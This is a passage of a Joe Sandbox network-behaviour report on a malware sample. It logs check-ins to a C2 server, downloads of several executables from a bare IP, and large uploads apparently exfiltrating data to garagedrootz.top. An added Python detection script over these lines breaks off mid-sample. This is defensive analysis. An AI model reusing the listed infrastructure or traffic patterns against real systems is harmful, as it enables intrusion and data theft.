                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global traffic | HTTP traffic detected: GET /files/527224533/ReK7Ewx.exe HTTP/1.1 | Host: 176.113.115.7
                                    Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 34 31 37 36 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10141760101&unit=246122658369
                                    Source: global traffic | HTTP traffic detected: GET /files/6691015685/V0Bt74c.exe HTTP/1.1 | Host: 176.113.115.7
                                    Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 34 31 37 37 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10141770101&unit=246122658369
                                    Source: global traffic | HTTP traffic detected: GET /files/5526411762/yUI6F6C.exe HTTP/1.1 | Host: 176.113.115.7
                                    Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 34 31 37 38 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10141780101&unit=246122658369
                                    Source: global traffic | HTTP traffic detected: GET /files/5419477542/ADFoyxP.exe HTTP/1.1 | Host: 176.113.115.7
                                    Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 34 31 37 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10141790101&unit=246122658369
                                    Source: global traffic | HTTP traffic detected: GET /files/7868598855/zY9sqWs.exe HTTP/1.1 | Host: 176.113.115.7
                                    Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 34 31 38 30 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10141800101&unit=246122658369
                                    Source: global traffic | HTTP traffic detected: GET /files/5526411762/CgmaT61.exe HTTP/1.1 | Host: 176.113.115.7
                                    Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 34 31 38 31 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10141810101&unit=246122658369
                                    Source: global traffic | HTTP traffic detected: GET /files/7098980627/mAtJWNv.exe HTTP/1.1 | Host: 176.113.115.7
                                    Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 34 31 38 32 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10141820101&unit=246122658369
                                    Source: global traffic | HTTP traffic detected: GET /files/6386900832/PfOHmro.exe HTTP/1.1 | Host: 176.113.115.7
                                    Source: Joe Sandbox View | IP Address: 176.113.115.7 176.113.115.7
                                    Source: Joe Sandbox View | ASN Name: SELECTELRU SELECTELRU
                                    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: Joe Sandbox View | ASN Name: SELECTELRU SELECTELRU
                                    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49796 -> 176.113.115.7:80
                                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49804 -> 176.113.115.7:80
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49807 -> 188.114.97.3:443
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49809 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49800 -> 176.113.115.7:80
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49814 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49816 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49817 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49820 -> 176.113.115.7:80
                                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49812 -> 176.113.115.7:80
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49819 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49825 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49821 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49822 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49826 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49831 -> 176.113.115.7:80
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49828 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49830 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49801 -> 188.114.97.3:443
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49832 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49834 -> 188.114.97.3:443
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49833 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49836 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49838 -> 176.113.115.7:80
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49842 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49844 -> 176.113.115.7:80
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49846 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49839 -> 5.75.210.149:443
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49850 -> 104.21.16.1:443
                                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49852 -> 104.21.16.1:443
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 57 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=qriTljdfXXOq8FKC | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 19617 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 59 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=a2PpkNgZu1Axv | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8759 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=51p6xEbx0qRIVN424j4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20442 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=8otA9KxX8H07r3kYp8y | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 2393 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=7rAQ1E29CZ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 19589 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=4TJl1FAOHWyfTMlfhh | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8786 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=fJvTyLf3tbaiBZ1q424 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 547884 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=mbD45cRGFDN8Fs | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20419 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=aiBagi9E5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 2344 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 95 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=5xlGFa6u | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 549886 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 97 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 59 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=7NMW5Z6l | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 19579 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=21NrE5itsdJ6eo6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8771 | Host: garagedrootz.top
                                    Source: global traffic | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=BwZNskmyMp | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20399 | Host: garagedrootz.top
                                    Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                                     Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0049CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0049CE44
                                     Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
                                     Source: global traffic | HTTP traffic detected: GET /files/527224533/ReK7Ewx.exe HTTP/1.1 | Host: 176.113.115.7
                                     Source: global traffic | HTTP traffic detected: GET /files/6691015685/V0Bt74c.exe HTTP/1.1 | Host: 176.113.115.7
                                     Source: global traffic | HTTP traffic detected: GET /files/5526411762/yUI6F6C.exe HTTP/1.1 | Host: 176.113.115.7
                                     Source: global traffic | HTTP traffic detected: GET /files/5419477542/ADFoyxP.exe HTTP/1.1 | Host: 176.113.115.7
                                     Source: global traffic | HTTP traffic detected: GET /files/7868598855/zY9sqWs.exe HTTP/1.1 | Host: 176.113.115.7
                                     Source: global traffic | HTTP traffic detected: GET /files/5526411762/CgmaT61.exe HTTP/1.1 | Host: 176.113.115.7
                                     Source: global traffic | HTTP traffic detected: GET /files/7098980627/mAtJWNv.exe HTTP/1.1 | Host: 176.113.115.7
                                     Source: global traffic | HTTP traffic detected: GET /files/6386900832/PfOHmro.exe HTTP/1.1 | Host: 176.113.115.7
                                     Source: global traffic | DNS traffic detected: DNS query: FQOotUESSGVeVFGvdJzYolWH.FQOotUESSGVeVFGvdJzYolWH
                                     Source: global traffic | DNS traffic detected: DNS query: arisechairedd.shop
                                     Source: global traffic | DNS traffic detected: DNS query: begindecafer.world
                                     Source: global traffic | DNS traffic detected: DNS query: garagedrootz.top
                                     Source: global traffic | DNS traffic detected: DNS query: api.ip.sb
                                     Source: unknown | HTTP traffic detected: POST /oPsoJAN HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 57 | Host: garagedrootz.top
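The traffic entries above carry two network shapes worth turning into detection logic rather than reading as a flat IOC list: executables pulled by plain GET from a literal IP address that never appears in a DNS query (the /files/<digits>/<name>.exe downloads from 176.113.115.7), and a run of POSTs to one fixed path on garagedrootz.top that alternates small application/x-www-form-urlencoded check-ins with multipart/form-data uploads of up to 549886 bytes, all with a browser User-Agent. The script below is an added example, not part of the Joe Sandbox report: it parses the report's own traffic lines (reproduced as a constructed sample, in the run-together form the text export produces, where "Keep-AliveContent-Type:" has no separator) and emits hits for those shapes. The rule names and the three-POST threshold are this example's assumptions.

```python
"""Detection heuristics over a Joe Sandbox network-behaviour text export.

Added example, not part of the report. SAMPLE holds this report's HTTP and
DNS entries (constructed input, copied as the text export prints them, with
header fields run together). Rule names and MIN_POSTS are assumptions.
"""
import re
from collections import defaultdict

SAMPLE = """\
Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5xlGFa6uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 549886Host: garagedrootz.top
Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 97Host: garagedrootz.top
Source: global trafficHTTP traffic detected: POST /oPsoJAN HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7NMW5Z6lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19579Host: garagedrootz.top
Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /files/527224533/ReK7Ewx.exe HTTP/1.1Host: 176.113.115.7
Source: global trafficHTTP traffic detected: GET /files/6691015685/V0Bt74c.exe HTTP/1.1Host: 176.113.115.7
Source: global trafficDNS traffic detected: DNS query: garagedrootz.top
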